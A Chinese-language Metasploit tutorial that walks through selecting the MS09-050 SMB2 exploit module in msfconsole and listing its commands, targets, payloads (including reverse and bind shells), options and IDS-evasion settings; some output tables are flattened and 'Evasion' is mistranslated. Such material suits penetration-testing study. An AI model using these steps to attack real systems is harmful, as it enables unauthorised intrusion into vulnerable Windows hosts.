Metasploit 如何使用Exploits（漏洞）

在Metasploit中選擇一個漏洞利用程序將'exploit'和'check'命令添加到msfconsole。

msf > use  exploit/windows/smb/ms09_050_smb2_negotiate_func_index
msf exploit(ms09_050_smb2_negotiate_func_index) > help
...略...
Exploit 命令
================

    命   令       描    述
    -------       -----------
    check         檢查目標是否易受攻擊
    exploit       啟動漏洞利用嘗試
    pry           在當前模塊上打開一個Pry會話
    rcheck        重新加載模塊並檢查目標是否存在漏洞
    reload        只需重新加載模塊
    rerun         重新運行exploit（漏洞）的別名
    rexploit      重新加載模塊並啟動漏洞攻擊嘗試
    run           運行exploit（漏洞）的別名

msf exploit(ms09_050_smb2_negotiate_func_index) >

 

show

使用exploits（漏洞）還會為'show'命令添加更多選項。

 

MSF Exploit Targets（漏洞目標）：

msf exploit(ms09_050_smb2_negotiate_func_index) > show targets

Exploit targets:

   Id  Name
   --  ----
   0 Windows Vista SP1/SP2 and Server 2008 (x86)

 

MSF Exploit Payloads（漏洞有效載荷）：

msf exploit(ms09_050_smb2_negotiate_func_index) > show payloads

Compatible Payloads
===================

   Name                              Disclosure Date  Rank    Description
   ----                              ---------------  ----    -----------
   generic/custom                                     normal  Custom Payload
   generic/debug_trap normal Generic x86 Debug Trap generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline generic/tight_loop normal Generic x86 Tight Loop windows/adduser normal Windows Execute net user /ADD ...略...

 

MSF Exploit Options（漏洞選項）:

msf exploit(ms09_050_smb2_negotiate_func_index) > show options

Module options (exploit/windows/smb/ms09_050_smb2_negotiate_func_index):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.136 yes The target address RPORT 445 yes The target port (TCP) WAIT 180 yes The number of seconds to wait for the attack to complete. Exploit target: Id Name -- ---- 0 Windows Vista SP1/SP2 and Server 2008 (x86)

 

Advanced（高級）：

msf exploit(ms09_050_smb2_negotiate_func_index) > show advanced

Module advanced options (exploit/windows/smb/ms09_050_smb2_negotiate_func_index):

   Name                    Current Setting    Required  Description
   ----                    ---------------    --------  -----------
   CHOST                                      no The local client address CPORT no The local client port ConnectTimeout 10 yes Maximum number of seconds to establish a TCP connection ContextInformationFile no The information file that contains context information DisablePayloadHandler false no Disable the handler code for the selected payload EnableContextEncoding false no Use transient context when encoding payloads ...略...

 

Evasion（越獄）：

msf exploit(ms09_050_smb2_negotiate_func_index) > show evasion

Module evasion options:

   Name                           Current Setting  Required  Description
   ----                           ---------------  --------  -----------
   SMB::obscure_trans_pipe_level  0 yes Obscure PIPE string in TransNamedPipe (level 0-3) SMB::pad_data_level 0 yes Place extra padding between headers and data (level 0-3) SMB::pad_file_level 0 yes Obscure path names used in open/create (level 0-3) SMB::pipe_evasion false yes Enable segmented read/writes for SMB Pipes SMB::pipe_read_max_size 1024 yes Maximum buffer size for pipe reads SMB::pipe_read_min_size 1 yes Minimum buffer size for pipe reads SMB::pipe_write_max_size 1024 yes Maximum buffer size for pipe writes SMB::pipe_write_min_size 1 yes Minimum buffer size for pipe writes TCP::max_send_size 0 no Maxiumum tcp segment size. (0 = disable) TCP::send_delay 0 no Delays inserted before every send. (0 = disable)


轉:https://www.fujieace.com/metasploit/exploits.html